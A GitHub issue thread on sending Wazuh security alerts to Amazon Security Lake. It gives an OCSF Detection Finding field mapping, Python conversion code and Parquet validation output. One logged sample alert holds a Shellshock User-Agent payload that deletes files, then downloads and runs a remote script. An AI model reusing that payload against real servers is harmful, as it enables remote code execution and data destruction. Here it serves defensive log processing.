Amazon Security Lake integration - Data transform and delivery (DTD) #145

AlexRuiz7 · 2024-01-31T11:36:08Z

Description

Now that we know how OCSF works, how to encode data in Parquet, and how to implement a Logstash pipeline that sends events from wazuh-indexer indexes to an S3 bucket, we need to bundle it all together and prepare the data before sending it to AWS.

As explained in #113, the data must be transformed within the pipeline so that it reaches the Amazon Security Lake S3 bucket already formatted as OCSF and encoded as Parquet.

To transform the data, we'll explore two approaches: a Lambda function and a Python script. The main difference between them is the resources required, as the Lambda function needs an auxiliary S3 bucket.
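
For the Lambda approach, one plausible wiring (an assumption, not something this issue settles) is that Logstash writes raw events to the auxiliary S3 bucket and an S3 event notification triggers the function. The sketch below only covers the entry point: it extracts the bucket and object key from the notification payload. The names `extract_objects` and `lambda_handler` are illustrative, and downloading the object, converting it to OCSF and Parquet, and uploading it to Security Lake are left out.

```python
from urllib.parse import unquote_plus


def extract_objects(event: dict) -> list[tuple[str, str]]:
    """Return (bucket, key) pairs from an S3 event notification payload."""
    objects = []
    for record in event.get("Records", []):
        s3 = record.get("s3", {})
        bucket = s3.get("bucket", {}).get("name")
        key = s3.get("object", {}).get("key")
        if bucket and key:
            # Object keys arrive URL-encoded in S3 notifications.
            objects.append((bucket, unquote_plus(key)))
    return objects


def lambda_handler(event, context):
    # Hypothetical entry point: the transform and upload steps are omitted.
    objects = extract_objects(event)
    return {"objects": [{"bucket": b, "key": k} for b, k in objects]}
```

The Python script approach would skip this trigger entirely and transform the events before they are written to S3, which is why it does not need the extra bucket.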

Tasks

Subtasks

Definition of done

These two proposals will be worked on in parallel. As soon as we get one of them working, we can consider this issue completed. Once that happens, we'll discuss the next steps.

kclinden · 2024-01-31T13:46:16Z

Has sending the data to a Kinesis Firehose with data transformation to parquet been considered?
https://docs.aws.amazon.com/firehose/latest/dev/record-format-conversion.html

AlexRuiz7 · 2024-02-09T16:24:21Z

Together with the @wazuh/threat-intel team, we have worked on mappings to transform our data to the OCSF schema. To do that, we'll use the Detection Finding (2004) class, added in the v1.1.0 release of OCSF. The first proposal was to use the Security Finding (2001) class, but it was discarded because it is deprecated in the latest version of OCSF.

OCSF Version: 1.1.0

| OCSF | Value |
| --- | --- |
| `category_uid` | 2 |
| `category_name` | Findings |
| `class_uid` | 2004 |
| `class_name` | Detection Finding |
| `type_uid` | 200401 |
| `metadata.product.name` | Wazuh |
| `metadata.product.vendor_name` | Wazuh, Inc,. |
| `metadata.product.version` | 4.9.0 |
| `metadata.product.lang` | en |
| `metadata.log_name` | Security events |
| `metadata.log_provider` | Wazuh |

| OCSF (2004) | Wazuh event field (or constant) |
| --- | --- |
| `activity_id` | 1 |
| `time` | timestamp |
| `message` | rule.description |
| `count` | rule.firedtimes |
| `finding_info.uid` | id |
| `finding_info.title` | rule.description |
| `finding_info.types` | input.type |
| `finding_info.analytic.category` | rule.groups |
| `finding_info.analytic.name` | decoder.name |
| `finding_info.analytic.type` | Rule |
| `finding_info.analytic.type_id` | 1 |
| `finding_info.analytic.uid` | rule.id |
| `risk_score` | rule.level |
| `finding_info.attacks.tactic.name` | rule.mitre.tactic |
| `finding_info.attacks.technique.name` | rule.mitre.technique |
| `finding_info.attacks.technique.uid` | rule.mitre.id |
| `finding_info.attacks.version` | v13.1 |
| `unmapped.nist` | rule.nist_800_53 |
| `severity_id` | convert(rule.level) |
| `status_id` | 99 |
| `resources.name` | agent.name |
| `resources.uid` | agent.id |
| `unmapped.data_sources` | ['_index', 'location', 'manager.name'] |
| `raw_data` | full_log |

Originally posted by @IsExec in https://github.com/wazuh/internal-devel-requests/issues/699#issuecomment-1933401673
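
The constant `type_uid` in the first table is not arbitrary: OCSF derives it from the class and the activity as `class_uid * 100 + activity_id`. A minimal sketch of that arithmetic follows (the function name `type_uid` is only illustrative):

```python
def type_uid(class_uid: int, activity_id: int) -> int:
    """Compute the OCSF type_uid from a class UID and an activity ID."""
    return class_uid * 100 + activity_id


# Detection Finding (2004) with activity_id 1, as used in the tables above
print(type_uid(2004, 1))  # 200401
```

If the activity ever stops being a constant, `type_uid` would need to change along with it.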

To check that these mappings work and make our data OCSF compliant, we used the validate tool from amazon-security-lake-ocsf-validation, which had to be updated (link redirects to the updated version), together with the CLI Python module parquet-tools.

parquet-tools show parquet/wazuh-event.ocsf.parquet

+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+
|   activity_id | category_name   |   category_uid | class_name        |   class_uid |   count | message                   | finding_info                                                                                                                                                                                                                                                                                                                                                                                                                           | metadata                                                                                                                                                | raw_data                                                                                                                                                                                                                | resources                                |   risk_score |   severity_id |   status_id | time                         |   type_uid | unmapped                                                                            |
|---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------|
|             1 | Findings        |              2 | Detection Finding |        2004 |       1 | Shellshock attack attempt | {'analytic': {'category': 'web,accesslog,attack', 'name': 'web-accesslog', 'type_id': 1, 'uid': '31166'}, 'attacks': {'tactic': {'name': 'Privilege Escalation,Initial Access'}, 'technique': {'name': 'Exploitation for Privilege Escalation,Exploit Public-Facing Application', 'uid': 'T1068,T1190'}, 'version': 'v13.1'}, 'title': 'Shellshock attack attempt', 'types': array(['log'], dtype=object), 'uid': '1707402914.872885'} | {'log_name': 'Security events', 'log_provider': 'Wazuh', 'product': {'lang': 'en', 'name': 'Wazuh', 'vendor_name': 'Wazuh, Inc,.'}, 'version': '1.1.0'} | 000.111.222.10 - - [08/Feb/2024:11:35:12 -0300] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 162 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://0.0.0.0/baddie.sh; chmod 777 baddie.sh; ./baddie.sh'" | [{'name': 'redacted.com', 'uid': '000'}] |            6 |             6 |          99 | 2024-02-08T11:35:14.334-0300 |     200401 | {'data_sources': array(['wazuh-alerts-4.x-2024.02.08', '/var/log/nginx/access.log', |
|               |                 |                |                   |             |         |                           |                                                                                                                                                                                                                                                                                                                                                                                                                                        |                                                                                                                                                         |                                                                                                                                                                                                                         |                                          |              |               |             |                              |            |        'redacted.com'], dtype=object), 'nist': array(['SI.4'], dtype=object)}       |
+---------------+-----------------+----------------+-------------------+-------------+---------+---------------------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------------------------------------+--------------+---------------+-------------+------------------------------+------------+-------------------------------------------------------------------------------------+

python validate.py -i ../../wazuh-indexer/integrations/amazon-security-lake/parquet/output -version ocsf_schema_1.1.0

Attempting to Validate File: wazuh-event.ocsf.parquet...

Validating Against Event Class: detection_finding (2004)...

VALID OCSF.

Python mappings to OCSF

#!/usr/bin/python

# event comes from Filebeat
event = {}


def normalize(level: int) -> int:
    """
    Normalizes rule level into the 0-6 range, required by OCSF.
    """
    # TODO normalization
    return level


def join(iterable, separator=","):
    """
    Joins an iterable of strings into a single separator-delimited string.
    """
    return separator.join(iterable)


def convert(event: dict) -> dict:
    """
    Converts Wazuh events to OCSF's Detection Finding (2004) class.
    """
    ocsf_class_template = \
        {
            "activity_id": 1,
            "category_name": "Findings",
            "category_uid": 2,
            "class_name": "Detection Finding",
            "class_uid": 2004,
            "count": event["_source"]["rule"]["firedtimes"],
            "message": event["_source"]["rule"]["description"],
            "finding_info": {
                "analytic": {
                    "category": join(event["_source"]["rule"]["groups"]),
                    "name": event["_source"]["decoder"]["name"],
                    "type_id": 1,
                    "uid": event["_source"]["rule"]["id"],
                },
                "attacks": {
                    "tactic": {
                        "name": join(event["_source"]["rule"]["mitre"]["tactic"]),
                    },
                    "technique": {
                        "name": join(event["_source"]["rule"]["mitre"]["technique"]),
                        "uid": join(event["_source"]["rule"]["mitre"]["id"]),
                    },
                    "version": "v13.1"
                },
                "title": event["_source"]["rule"]["description"],
                "types": [
                    event["_source"]["input"]["type"]
                ],
                "uid": event["_source"]['id']
            },
            "metadata": {
                "log_name": "Security events",
                "log_provider": "Wazuh",
                "product": {
                    "name": "Wazuh",
                    "lang": "en",
                    "vendor_name": "Wazuh, Inc,."
                },
                "version": "1.1.0",
            },
            "raw_data": event["_source"]["full_log"],
            "resources": [
                {
                    "name": event["_source"]["agent"]["name"],
                    "uid": event["_source"]["agent"]["id"]
                },
            ],
            "risk_score": event["_source"]["rule"]["level"],
            "severity_id": normalize(event["_source"]["rule"]["level"]),
            "status_id": 99,
            "time": event["_source"]["timestamp"],
            "type_uid": 200401,
            "unmapped": {
                "data_sources": [
                    event["_index"],
                    event["_source"]["location"],
                    event["_source"]["manager"]["name"]
                ],
                "nist": event["_source"]["rule"]["nist_800_53"],  # Array
            }
        }

    return ocsf_class_template
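
The `normalize` function above is still a TODO, so the sample output shows `severity_id` 6 for a rule of level 6, which OCSF reads as Fatal. One possible way to fill it in is sketched below. The thresholds are an assumption made for illustration, not an agreed mapping; the `severity_id` values follow the OCSF enum (0 Unknown, 1 Informational, 2 Low, 3 Medium, 4 High, 5 Critical, 6 Fatal).

```python
def normalize(level: int) -> int:
    """Map a Wazuh rule level to an OCSF severity_id (illustrative thresholds)."""
    if level >= 15:
        return 5  # Critical
    if level >= 11:
        return 4  # High
    if level >= 8:
        return 3  # Medium
    if level >= 4:
        return 2  # Low
    if level >= 0:
        return 1  # Informational
    return 0  # Unknown: negative or otherwise unexpected level


for level in (3, 6, 12, 15):
    print(level, "->", normalize(level))
```

With these thresholds the Shellshock sample (level 6) would be reported as Low instead of Fatal, while `risk_score` keeps the original level.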

AlexRuiz7 · 2024-02-13T17:43:22Z

I'm working on an event generator tool to test the integration and ease its development.
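
As a rough idea of what such a generator could look like (this is not the tool itself; the function name `generate_event` and every sample value are illustrative assumptions), the sketch below emits random events carrying the fields that `convert` reads:

```python
import json
import random
from datetime import datetime, timezone


def generate_event(rng: random.Random) -> dict:
    """Build one fake alert with the fields the OCSF mapping reads."""
    return {
        "_index": "wazuh-alerts-4.x-sample",
        "_source": {
            "id": f"{rng.randint(10**9, 10**10 - 1)}.{rng.randint(0, 999999)}",
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "full_log": "sample log line",
            "location": "/var/log/sample.log",
            "input": {"type": "log"},
            "decoder": {"name": rng.choice(["web-accesslog", "sshd", "syslog"])},
            "agent": {"id": f"{rng.randint(0, 999):03d}", "name": "sample-agent"},
            "manager": {"name": "sample-manager"},
            "rule": {
                "id": str(rng.randint(1, 99999)),
                "level": rng.randint(0, 15),
                "firedtimes": rng.randint(1, 10),
                "description": "Sample rule description",
                "groups": ["sample", "test"],
                "mitre": {
                    "id": ["T1190"],
                    "tactic": ["Initial Access"],
                    "technique": ["Exploit Public-Facing Application"],
                },
                "nist_800_53": ["SI.4"],
            },
        },
    }


if __name__ == "__main__":
    rng = random.Random(42)  # fixed seed so test runs are repeatable
    for _ in range(3):
        print(json.dumps(generate_event(rng)))
```

Passing the `random.Random` instance in keeps the generator deterministic under a fixed seed, apart from the timestamp.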

AlexRuiz7 added the level/task and type/enhancement labels Jan 31, 2024

This was referenced Jan 31, 2024

Amazon Security lake integration as source #128

Closed

Amazon Security Lake integration - Logstash #135

Closed

This was referenced Feb 13, 2024

Add events generator tool for wazuh-alerts #152

Merged

Amazon Security Lake integration - DTD - Python script #144

Closed

Amazon Security Lake integration - DTD - OCSF compliant events #156

Closed

AlexRuiz7 closed this as completed Apr 24, 2024

This was referenced Apr 25, 2024

Bad Parquet format on Amazon Security Lake integration #214

Closed

Amazon Security Lake integration - Use Security Finding class #215

Closed
